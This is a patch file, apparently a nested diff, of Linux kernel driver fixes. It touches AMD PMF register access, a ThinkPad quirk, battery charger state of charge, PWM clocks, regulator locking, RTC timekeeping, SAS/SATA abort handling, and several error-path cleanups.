+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index da23639071d79..0acc0b6221290 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -8,6 +8,7 @@
+  * Author: Shyam Sundar S K <Shyam-sundar.S-k@amd.com>
+  */
+ 
++#include <asm/amd_nb.h>
+ #include <linux/debugfs.h>
+ #include <linux/iopoll.h>
+ #include <linux/module.h>
+@@ -22,8 +23,6 @@
+ #define AMD_PMF_REGISTER_ARGUMENT	0xA58
+ 
+ /* Base address of SMU for mapping physical address to virtual address */
+-#define AMD_PMF_SMU_INDEX_ADDRESS	0xB8
+-#define AMD_PMF_SMU_INDEX_DATA		0xBC
+ #define AMD_PMF_MAPPING_SIZE		0x01000
+ #define AMD_PMF_BASE_ADDR_OFFSET	0x10000
+ #define AMD_PMF_BASE_ADDR_LO		0x13B102E8
+@@ -348,30 +347,19 @@ static int amd_pmf_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	dev->cpu_id = rdev->device;
+-	err = pci_write_config_dword(rdev, AMD_PMF_SMU_INDEX_ADDRESS, AMD_PMF_BASE_ADDR_LO);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMF_SMU_INDEX_ADDRESS);
+-		pci_dev_put(rdev);
+-		return pcibios_err_to_errno(err);
+-	}
+ 
+-	err = pci_read_config_dword(rdev, AMD_PMF_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMF_BASE_ADDR_LO, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error in reading from 0x%x\n", AMD_PMF_BASE_ADDR_LO);
+ 		pci_dev_put(rdev);
+ 		return pcibios_err_to_errno(err);
+ 	}
+ 
+ 	base_addr_lo = val & AMD_PMF_BASE_ADDR_HI_MASK;
+ 
+-	err = pci_write_config_dword(rdev, AMD_PMF_SMU_INDEX_ADDRESS, AMD_PMF_BASE_ADDR_HI);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMF_SMU_INDEX_ADDRESS);
+-		pci_dev_put(rdev);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMF_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMF_BASE_ADDR_HI, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error in reading from 0x%x\n", AMD_PMF_BASE_ADDR_HI);
+ 		pci_dev_put(rdev);
+ 		return pcibios_err_to_errno(err);
+ 	}
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 2a48a2d880d86..d1ec31086e9ba 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -4481,6 +4481,14 @@ static const struct dmi_system_id fwbug_list[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "20UH"),
+ 		}
+ 	},
++	{
++		.ident = "T14s Gen1 AMD",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "20UJ"),
++		}
++	},
+ 	{
+ 		.ident = "P14s Gen1 AMD",
+ 		.driver_data = &quirk_s2idle_bug,
+diff --git a/drivers/power/supply/generic-adc-battery.c b/drivers/power/supply/generic-adc-battery.c
+index 66039c665dd1e..0af536f4932f1 100644
+--- a/drivers/power/supply/generic-adc-battery.c
++++ b/drivers/power/supply/generic-adc-battery.c
+@@ -135,6 +135,9 @@ static int read_channel(struct gab *adc_bat, enum power_supply_property psp,
+ 			result);
+ 	if (ret < 0)
+ 		pr_err("read channel error\n");
++	else
++		*result *= 1000;
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index 36f807b5ec442..f1b431aa0e4f2 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -335,6 +335,20 @@ static int rk817_bat_calib_cap(struct rk817_charger *charger)
+ 			charger->fcc_mah * 1000);
+ 	}
+ 
++	/*
++	 * Set the SOC to 0 if we are below the minimum system voltage.
++	 */
++	if (volt_avg <= charger->bat_voltage_min_design_uv) {
++		charger->soc = 0;
++		charge_now_adc = CHARGE_TO_ADC(0, charger->res_div);
++		put_unaligned_be32(charge_now_adc, bulk_reg);
++		regmap_bulk_write(rk808->regmap,
++				  RK817_GAS_GAUGE_Q_INIT_H3, bulk_reg, 4);
++		dev_warn(charger->dev,
++			 "Battery voltage %d below minimum voltage %d\n",
++			 volt_avg, charger->bat_voltage_min_design_uv);
++		}
++
+ 	rk817_record_battery_nvram_values(charger);
+ 
+ 	return 0;
+@@ -710,9 +724,10 @@ static int rk817_read_battery_nvram_values(struct rk817_charger *charger)
+ 
+ 	/*
+ 	 * Read the nvram for state of charge. Sanity check for values greater
+-	 * than 100 (10000). If the value is off it should get corrected
+-	 * automatically when the voltage drops to the min (soc is 0) or when
+-	 * the battery is full (soc is 100).
++	 * than 100 (10000) or less than 0, because other things (BSP kernels,
++	 * U-Boot, or even i2cset) can write to this register. If the value is
++	 * off it should get corrected automatically when the voltage drops to
++	 * the min (soc is 0) or when the battery is full (soc is 100).
+ 	 */
+ 	ret = regmap_bulk_read(charger->rk808->regmap,
+ 			       RK817_GAS_GAUGE_BAT_R1, bulk_reg, 3);
+@@ -721,6 +736,8 @@ static int rk817_read_battery_nvram_values(struct rk817_charger *charger)
+ 	charger->soc = get_unaligned_le24(bulk_reg);
+ 	if (charger->soc > 10000)
+ 		charger->soc = 10000;
++	if (charger->soc < 0)
++		charger->soc = 0;
+ 
+ 	return 0;
+ }
+@@ -731,8 +748,8 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ {
+ 	struct rk808 *rk808 = charger->rk808;
+ 	u8 bulk_reg[4];
+-	u32 boot_voltage, boot_charge_mah, tmp;
+-	int ret, reg, off_time;
++	u32 boot_voltage, boot_charge_mah;
++	int ret, reg, off_time, tmp;
+ 	bool first_boot;
+ 
+ 	/*
+@@ -785,10 +802,12 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 				 bulk_reg, 4);
+ 		tmp = get_unaligned_be32(bulk_reg);
++		if (tmp < 0)
++			tmp = 0;
+ 		boot_charge_mah = ADC_TO_CHARGE_UAH(tmp,
+ 						    charger->res_div) / 1000;
+ 		/*
+-		 * Check if the columb counter has been off for more than 300
++		 * Check if the columb counter has been off for more than 30
+ 		 * minutes as it tends to drift downward. If so, re-init soc
+ 		 * with the boot voltage instead. Note the unit values for the
+ 		 * OFF_CNT register appear to be in decaminutes and stops
+@@ -799,7 +818,7 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		 * than 0 on a reboot anyway.
+ 		 */
+ 		regmap_read(rk808->regmap, RK817_GAS_GAUGE_OFF_CNT, &off_time);
+-		if (off_time >= 30) {
++		if (off_time >= 3) {
+ 			regmap_bulk_read(rk808->regmap,
+ 					 RK817_GAS_GAUGE_PWRON_VOL_H,
+ 					 bulk_reg, 2);
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 5cd7b90872c62..5732300eb0046 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -418,7 +418,7 @@ static const struct meson_pwm_data pwm_axg_ee_data = {
+ };
+ 
+ static const char * const pwm_axg_ao_parent_names[] = {
+-	"aoclk81", "xtal", "fclk_div4", "fclk_div5"
++	"xtal", "axg_ao_clk81", "fclk_div4", "fclk_div5"
+ };
+ 
+ static const struct meson_pwm_data pwm_axg_ao_data = {
+@@ -427,7 +427,7 @@ static const struct meson_pwm_data pwm_axg_ao_data = {
+ };
+ 
+ static const char * const pwm_g12a_ao_ab_parent_names[] = {
+-	"xtal", "aoclk81", "fclk_div4", "fclk_div5"
++	"xtal", "g12a_ao_clk81", "fclk_div4", "fclk_div5"
+ };
+ 
+ static const struct meson_pwm_data pwm_g12a_ao_ab_data = {
+@@ -436,7 +436,7 @@ static const struct meson_pwm_data pwm_g12a_ao_ab_data = {
+ };
+ 
+ static const char * const pwm_g12a_ao_cd_parent_names[] = {
+-	"xtal", "aoclk81",
++	"xtal", "g12a_ao_clk81",
+ };
+ 
+ static const struct meson_pwm_data pwm_g12a_ao_cd_data = {
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index ccf0ccdef29df..3811578fcff05 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -138,6 +138,19 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	high_width = mul_u64_u64_div_u64(state->duty_cycle, rate, div);
+ 	value = period | (high_width << PWM_HIGH_WIDTH_SHIFT);
+ 
++	if (mdp->data->bls_debug && !mdp->data->has_commit) {
++		/*
++		 * For MT2701, disable double buffer before writing register
++		 * and select manual mode and use PWM_PERIOD/PWM_HIGH_WIDTH.
++		 */
++		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
++					 mdp->data->bls_debug_mask,
++					 mdp->data->bls_debug_mask);
++		mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
++					 mdp->data->con0_sel,
++					 mdp->data->con0_sel);
++	}
++
+ 	mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
+ 				 PWM_CLKDIV_MASK,
+ 				 clk_div << PWM_CLKDIV_SHIFT);
+@@ -152,17 +165,6 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		mtk_disp_pwm_update_bits(mdp, mdp->data->commit,
+ 					 mdp->data->commit_mask,
+ 					 0x0);
+-	} else {
+-		/*
+-		 * For MT2701, disable double buffer before writing register
+-		 * and select manual mode and use PWM_PERIOD/PWM_HIGH_WIDTH.
+-		 */
+-		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
+-					 mdp->data->bls_debug_mask,
+-					 mdp->data->bls_debug_mask);
+-		mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
+-					 mdp->data->con0_sel,
+-					 mdp->data->con0_sel);
+ 	}
+ 
+ 	mtk_disp_pwm_update_bits(mdp, DISP_PWM_EN, mdp->data->enable_mask,
+@@ -194,6 +196,16 @@ static int mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 		return 0;
+ 	}
+ 
++	/*
++	 * Apply DISP_PWM_DEBUG settings to choose whether to enable or disable
++	 * registers double buffer and manual commit to working register before
++	 * performing any read/write operation
++	 */
++	if (mdp->data->bls_debug)
++		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
++					 mdp->data->bls_debug_mask,
++					 mdp->data->bls_debug_mask);
++
+ 	rate = clk_get_rate(mdp->clk_main);
+ 	con0 = readl(mdp->base + mdp->data->con0);
+ 	con1 = readl(mdp->base + mdp->data->con1);
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index cdac193634e07..c417eae887b2d 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -207,6 +207,78 @@ static void regulator_unlock(struct regulator_dev *rdev)
+ 	mutex_unlock(&regulator_nesting_mutex);
+ }
+ 
++/**
++ * regulator_lock_two - lock two regulators
++ * @rdev1:		first regulator
++ * @rdev2:		second regulator
++ * @ww_ctx:		w/w mutex acquire context
++ *
++ * Locks both rdevs using the regulator_ww_class.
++ */
++static void regulator_lock_two(struct regulator_dev *rdev1,
++			       struct regulator_dev *rdev2,
++			       struct ww_acquire_ctx *ww_ctx)
++{
++	struct regulator_dev *tmp;
++	int ret;
++
++	ww_acquire_init(ww_ctx, &regulator_ww_class);
++
++	/* Try to just grab both of them */
++	ret = regulator_lock_nested(rdev1, ww_ctx);
++	WARN_ON(ret);
++	ret = regulator_lock_nested(rdev2, ww_ctx);
++	if (ret != -EDEADLOCK) {
++		WARN_ON(ret);
++		goto exit;
++	}
++
++	while (true) {
++		/*
++		 * Start of loop: rdev1 was locked and rdev2 was contended.
++		 * Need to unlock rdev1, slowly lock rdev2, then try rdev1
++		 * again.
++		 */
++		regulator_unlock(rdev1);
++
++		ww_mutex_lock_slow(&rdev2->mutex, ww_ctx);
++		rdev2->ref_cnt++;
++		rdev2->mutex_owner = current;
++		ret = regulator_lock_nested(rdev1, ww_ctx);
++
++		if (ret == -EDEADLOCK) {
++			/* More contention; swap which needs to be slow */
++			tmp = rdev1;
++			rdev1 = rdev2;
++			rdev2 = tmp;
++		} else {
++			WARN_ON(ret);
++			break;
++		}
++	}
++
++exit:
++	ww_acquire_done(ww_ctx);
++}
++
++/**
++ * regulator_unlock_two - unlock two regulators
++ * @rdev1:		first regulator
++ * @rdev2:		second regulator
++ * @ww_ctx:		w/w mutex acquire context
++ *
++ * The inverse of regulator_lock_two().
++ */
++
++static void regulator_unlock_two(struct regulator_dev *rdev1,
++				 struct regulator_dev *rdev2,
++				 struct ww_acquire_ctx *ww_ctx)
++{
++	regulator_unlock(rdev2);
++	regulator_unlock(rdev1);
++	ww_acquire_fini(ww_ctx);
++}
++
+ static bool regulator_supply_is_couple(struct regulator_dev *rdev)
+ {
+ 	struct regulator_dev *c_rdev;
+@@ -334,6 +406,7 @@ static void regulator_lock_dependent(struct regulator_dev *rdev,
+ 			ww_mutex_lock_slow(&new_contended_rdev->mutex, ww_ctx);
+ 			old_contended_rdev = new_contended_rdev;
+ 			old_contended_rdev->ref_cnt++;
++			old_contended_rdev->mutex_owner = current;
+ 		}
+ 
+ 		err = regulator_lock_recursive(rdev,
+@@ -1583,9 +1656,6 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 			rdev->constraints->always_on = true;
+ 	}
+ 
+-	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get_boottime();
+-
+ 	/* If the constraints say the regulator should be on at this point
+ 	 * and we have control then make sure it is enabled.
+ 	 */
+@@ -1619,6 +1689,8 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 
+ 		if (rdev->constraints->always_on)
+ 			rdev->use_count++;
++	} else if (rdev->desc->off_on_delay) {
++		rdev->last_off = ktime_get();
+ 	}
+ 
+ 	print_constraints(rdev);
+@@ -1627,8 +1699,8 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 
+ /**
+  * set_supply - set regulator supply regulator
+- * @rdev: regulator name
+- * @supply_rdev: supply regulator name
++ * @rdev: regulator (locked)
++ * @supply_rdev: supply regulator (locked))
+  *
+  * Called by platform initialisation code to set the supply regulator for this
+  * regulator. This ensures that a regulators supply will also be enabled by the
+@@ -1800,6 +1872,8 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 	struct regulator *regulator;
+ 	int err = 0;
+ 
++	lockdep_assert_held_once(&rdev->mutex.base);
++
+ 	if (dev) {
+ 		char buf[REG_STR_SIZE];
+ 		int size;
+@@ -1827,9 +1901,7 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 	regulator->rdev = rdev;
+ 	regulator->supply_name = supply_name;
+ 
+-	regulator_lock(rdev);
+ 	list_add(&regulator->list, &rdev->consumer_list);
+-	regulator_unlock(rdev);
+ 
+ 	if (dev) {
+ 		regulator->dev = dev;
+@@ -1995,6 +2067,7 @@ static int regulator_resolve_supply(struct regulator_dev *rdev)
+ {
+ 	struct regulator_dev *r;
+ 	struct device *dev = rdev->dev.parent;
++	struct ww_acquire_ctx ww_ctx;
+ 	int ret = 0;
+ 
+ 	/* No supply to resolve? */
+@@ -2061,23 +2134,23 @@ static int regulator_resolve_supply(struct regulator_dev *rdev)
+ 	 * between rdev->supply null check and setting rdev->supply in
+ 	 * set_supply() from concurrent tasks.
+ 	 */
+-	regulator_lock(rdev);
++	regulator_lock_two(rdev, r, &ww_ctx);
+ 
+ 	/* Supply just resolved by a concurrent task? */
+ 	if (rdev->supply) {
+-		regulator_unlock(rdev);
++		regulator_unlock_two(rdev, r, &ww_ctx);
+ 		put_device(&r->dev);
+ 		goto out;
+ 	}
+ 
+ 	ret = set_supply(rdev, r);
+ 	if (ret < 0) {
+-		regulator_unlock(rdev);
++		regulator_unlock_two(rdev, r, &ww_ctx);
+ 		put_device(&r->dev);
+ 		goto out;
+ 	}
+ 
+-	regulator_unlock(rdev);
++	regulator_unlock_two(rdev, r, &ww_ctx);
+ 
+ 	/*
+ 	 * In set_machine_constraints() we may have turned this regulator on
+@@ -2190,7 +2263,9 @@ struct regulator *_regulator_get(struct device *dev, const char *id,
+ 		return regulator;
+ 	}
+ 
++	regulator_lock(rdev);
+ 	regulator = create_regulator(rdev, dev, id);
++	regulator_unlock(rdev);
+ 	if (regulator == NULL) {
+ 		regulator = ERR_PTR(-ENOMEM);
+ 		module_put(rdev->owner);
+@@ -2668,7 +2743,7 @@ static int _regulator_do_enable(struct regulator_dev *rdev)
+ 
+ 	trace_regulator_enable(rdev_get_name(rdev));
+ 
+-	if (rdev->desc->off_on_delay && rdev->last_off) {
++	if (rdev->desc->off_on_delay) {
+ 		/* if needed, keep a distance of off_on_delay from last time
+ 		 * this regulator was disabled.
+ 		 */
+@@ -6043,6 +6118,7 @@ static void regulator_summary_lock(struct ww_acquire_ctx *ww_ctx)
+ 			ww_mutex_lock_slow(&new_contended_rdev->mutex, ww_ctx);
+ 			old_contended_rdev = new_contended_rdev;
+ 			old_contended_rdev->ref_cnt++;
++			old_contended_rdev->mutex_owner = current;
+ 		}
+ 
+ 		err = regulator_summary_lock_all(ww_ctx,
+diff --git a/drivers/regulator/stm32-pwr.c b/drivers/regulator/stm32-pwr.c
+index 2a42acb7c24e9..e5dd4db6403b2 100644
+--- a/drivers/regulator/stm32-pwr.c
++++ b/drivers/regulator/stm32-pwr.c
+@@ -129,17 +129,16 @@ static const struct regulator_desc stm32_pwr_desc[] = {
+ 
+ static int stm32_pwr_regulator_probe(struct platform_device *pdev)
+ {
+-	struct device_node *np = pdev->dev.of_node;
+ 	struct stm32_pwr_reg *priv;
+ 	void __iomem *base;
+ 	struct regulator_dev *rdev;
+ 	struct regulator_config config = { };
+ 	int i, ret = 0;
+ 
+-	base = of_iomap(np, 0);
+-	if (!base) {
++	base = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(base)) {
+ 		dev_err(&pdev->dev, "Unable to map IO memory\n");
+-		return -ENOMEM;
++		return PTR_ERR(base);
+ 	}
+ 
+ 	config.dev = &pdev->dev;
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 35df1b0a515bf..67e7664efb0dc 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -1348,8 +1348,9 @@ static int __qcom_glink_send(struct glink_channel *channel,
+ 	ret = qcom_glink_tx(glink, &req, sizeof(req), data, chunk_size, wait);
+ 
+ 	/* Mark intent available if we failed */
+-	if (ret && intent) {
+-		intent->in_use = false;
++	if (ret) {
++		if (intent)
++			intent->in_use = false;
+ 		return ret;
+ 	}
+ 
+@@ -1370,8 +1371,9 @@ static int __qcom_glink_send(struct glink_channel *channel,
+ 				    chunk_size, wait);
+ 
+ 		/* Mark intent available if we failed */
+-		if (ret && intent) {
+-			intent->in_use = false;
++		if (ret) {
++			if (intent)
++				intent->in_use = false;
+ 			break;
+ 		}
+ 	}
+diff --git a/drivers/rtc/rtc-meson-vrtc.c b/drivers/rtc/rtc-meson-vrtc.c
+index 1463c86215615..648fa362ec447 100644
+--- a/drivers/rtc/rtc-meson-vrtc.c
++++ b/drivers/rtc/rtc-meson-vrtc.c
+@@ -23,7 +23,7 @@ static int meson_vrtc_read_time(struct device *dev, struct rtc_time *tm)
+ 	struct timespec64 time;
+ 
+ 	dev_dbg(dev, "%s\n", __func__);
+-	ktime_get_raw_ts64(&time);
++	ktime_get_real_ts64(&time);
+ 	rtc_time64_to_tm(time.tv_sec, tm);
+ 
+ 	return 0;
+@@ -96,7 +96,7 @@ static int __maybe_unused meson_vrtc_suspend(struct device *dev)
+ 		long alarm_secs;
+ 		struct timespec64 time;
+ 
+-		ktime_get_raw_ts64(&time);
++		ktime_get_real_ts64(&time);
+ 		local_time = time.tv_sec;
+ 
+ 		dev_dbg(dev, "alarm_time = %lus, local_time=%lus\n",
+diff --git a/drivers/rtc/rtc-omap.c b/drivers/rtc/rtc-omap.c
+index 4d4f3b1a73093..73634a3ccfd3b 100644
+--- a/drivers/rtc/rtc-omap.c
++++ b/drivers/rtc/rtc-omap.c
+@@ -25,6 +25,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/rtc.h>
++#include <linux/rtc/rtc-omap.h>
+ 
+ /*
+  * The OMAP RTC is a year/month/day/hours/minutes/seconds BCD clock
+diff --git a/drivers/rtc/rtc-ti-k3.c b/drivers/rtc/rtc-ti-k3.c
+index ba23163cc0428..0d90fe9233550 100644
+--- a/drivers/rtc/rtc-ti-k3.c
++++ b/drivers/rtc/rtc-ti-k3.c
+@@ -632,7 +632,8 @@ static int __maybe_unused ti_k3_rtc_suspend(struct device *dev)
+ 	struct ti_k3_rtc *priv = dev_get_drvdata(dev);
+ 
+ 	if (device_may_wakeup(dev))
+-		enable_irq_wake(priv->irq);
++		return enable_irq_wake(priv->irq);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index 5a6d9c15395f7..bce3422d85640 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -2941,7 +2941,7 @@ static int _dasd_requeue_request(struct dasd_ccw_req *cqr)
+ 		return 0;
+ 	spin_lock_irq(&cqr->dq->lock);
+ 	req = (struct request *) cqr->callback_data;
+-	blk_mq_requeue_request(req, false);
++	blk_mq_requeue_request(req, true);
+ 	spin_unlock_irq(&cqr->dq->lock);
+ 
+ 	return 0;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
+index d643c5a49aa94..70c24377c6a19 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
+@@ -1258,7 +1258,11 @@ static void slot_complete_v1_hw(struct hisi_hba *hisi_hba,
+ 
+ 		slot_err_v1_hw(hisi_hba, task, slot);
+ 		if (unlikely(slot->abort)) {
+-			sas_task_abort(task);
++			if (dev_is_sata(device) && task->ata_task.use_ncq)
++				sas_ata_device_link_abort(device, true);
++			else
++				sas_task_abort(task);
++
+ 			return;
+ 		}
+ 		goto out;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+index cded42f4ca445..02575d81afca2 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+@@ -2404,7 +2404,11 @@ static void slot_complete_v2_hw(struct hisi_hba *hisi_hba,
+ 				 error_info[2], error_info[3]);
+ 
+ 		if (unlikely(slot->abort)) {
+-			sas_task_abort(task);
++			if (dev_is_sata(device) && task->ata_task.use_ncq)
++				sas_ata_device_link_abort(device, true);
++			else
++				sas_task_abort(task);
++
+ 			return;
+ 		}
+ 		goto out;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index 620dcefe7b6f4..e8a3511040af2 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -2293,7 +2293,11 @@ static void slot_complete_v3_hw(struct hisi_hba *hisi_hba,
+ 					error_info[0], error_info[1],
+ 					error_info[2], error_info[3]);
+ 			if (unlikely(slot->abort)) {
+-				sas_task_abort(task);
++				if (dev_is_sata(device) && task->ata_task.use_ncq)
++					sas_ata_device_link_abort(device, true);
++				else
++					sas_task_abort(task);
++
+ 				return;
+ 			}
+ 			goto out;
+diff --git a/drivers/scsi/libsas/sas_ata.c b/drivers/scsi/libsas/sas_ata.c
+index 2fd55ef9ffca5..6b045be947b14 100644
+--- a/drivers/scsi/libsas/sas_ata.c
++++ b/drivers/scsi/libsas/sas_ata.c
+@@ -886,6 +886,24 @@ void sas_ata_wait_eh(struct domain_device *dev)
+ 	ata_port_wait_eh(ap);
+ }
+ 
++void sas_ata_device_link_abort(struct domain_device *device, bool force_reset)
++{
++	struct ata_port *ap = device->sata_dev.ap;
++	struct ata_link *link = &ap->link;
++	unsigned long flags;
++
++	spin_lock_irqsave(ap->lock, flags);
++	device->sata_dev.fis[2] = ATA_ERR | ATA_DRDY; /* tf status */
++	device->sata_dev.fis[3] = ATA_ABORTED; /* tf error */
++
++	link->eh_info.err_mask |= AC_ERR_DEV;
++	if (force_reset)
++		link->eh_info.action |= ATA_EH_RESET;
++	ata_link_abort(link);
++	spin_unlock_irqrestore(ap->lock, flags);
++}
++EXPORT_SYMBOL_GPL(sas_ata_device_link_abort);
++
+ int sas_execute_ata_cmd(struct domain_device *device, u8 *fis, int force_phy_id)
+ {
+ 	struct sas_tmf_task tmf_task = {};
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index 2f38c8d5a48a9..d54fd153cb115 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -11971,7 +11971,7 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 				goto out_iounmap_all;
+ 		} else {
+ 			error = -ENOMEM;
+-			goto out_iounmap_all;
++			goto out_iounmap_ctrl;
+ 		}
+ 	}
+ 
+@@ -11989,7 +11989,7 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 			dev_err(&pdev->dev,
+ 			   "ioremap failed for SLI4 HBA dpp registers.\n");
+ 			error = -ENOMEM;
+-			goto out_iounmap_ctrl;
++			goto out_iounmap_all;
+ 		}
+ 		phba->pci_bar4_memmap_p = phba->sli4_hba.dpp_regs_memmap_p;
+ 	}
+@@ -12014,9 +12014,11 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 	return 0;
+ 
+ out_iounmap_all:
+-	iounmap(phba->sli4_hba.drbl_regs_memmap_p);
++	if (phba->sli4_hba.drbl_regs_memmap_p)
++		iounmap(phba->sli4_hba.drbl_regs_memmap_p);
+ out_iounmap_ctrl:
+-	iounmap(phba->sli4_hba.ctrl_regs_memmap_p);
++	if (phba->sli4_hba.ctrl_regs_memmap_p)
++		iounmap(phba->sli4_hba.ctrl_regs_memmap_p);
+ out_iounmap_conf:
+ 	iounmap(phba->sli4_hba.conf_regs_memmap_p);
+ 
+diff --git a/drivers/scsi/megaraid.c b/drivers/scsi/megaraid.c
+index bf491af9f0d65..16e2cf848c6ef 100644
+--- a/drivers/scsi/megaraid.c
++++ b/drivers/scsi/megaraid.c
+@@ -1441,6 +1441,7 @@ mega_cmd_done(adapter_t *adapter, u8 completed[], int nstatus, int status)
+ 		 */
+ 		if (cmdid == CMDID_INT_CMDS) {
+ 			scb = &adapter->int_scb;
++			cmd = scb->cmd;
+ 
+ 			list_del_init(&scb->list);
+ 			scb->state = SCB_FREE;
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index ea9e69fb62826..64355d0baa5fb 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -2526,7 +2526,7 @@ static void mpi3mr_watchdog_work(struct work_struct *work)
+ 		mrioc->unrecoverable = 1;
+ 		goto schedule_work;
+ 	case MPI3_SYSIF_FAULT_CODE_SOFT_RESET_IN_PROGRESS:
+-		return;
++		goto schedule_work;
+ 	case MPI3_SYSIF_FAULT_CODE_CI_ACTIVATION_RESET:
+ 		reset_reason = MPI3MR_RESET_FROM_CIACTIV_FAULT;
+ 		break;
+diff --git a/drivers/soc/bcm/brcmstb/biuctrl.c b/drivers/soc/bcm/brcmstb/biuctrl.c
+index e1d7b45432485..364ddbe365c24 100644
+--- a/drivers/soc/bcm/brcmstb/biuctrl.c
++++ b/drivers/soc/bcm/brcmstb/biuctrl.c
+@@ -288,6 +288,10 @@ static int __init setup_hifcpubiuctrl_regs(struct device_node *np)
+ 	if (BRCM_ID(family_id) == 0x7260 && BRCM_REV(family_id) == 0)
+ 		cpubiuctrl_regs = b53_cpubiuctrl_no_wb_regs;
+ out:
++	if (ret && cpubiuctrl_base) {
++		iounmap(cpubiuctrl_base);
++		cpubiuctrl_base = NULL;
++	}
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soc/renesas/renesas-soc.c b/drivers/soc/renesas/renesas-soc.c
+index 621ceaa047d47..057b85b158f99 100644
+--- a/drivers/soc/renesas/renesas-soc.c
++++ b/drivers/soc/renesas/renesas-soc.c
+@@ -454,8 +454,11 @@ static int __init renesas_soc_init(void)
+ 	}
+ 
+ 	soc_dev_attr = kzalloc(sizeof(*soc_dev_attr), GFP_KERNEL);
+-	if (!soc_dev_attr)
++	if (!soc_dev_attr) {
++		if (chipid)
++			iounmap(chipid);
+ 		return -ENOMEM;
++	}
+ 
+ 	np = of_find_node_by_path("/");
+ 	of_property_read_string(np, "model", &soc_dev_attr->machine);
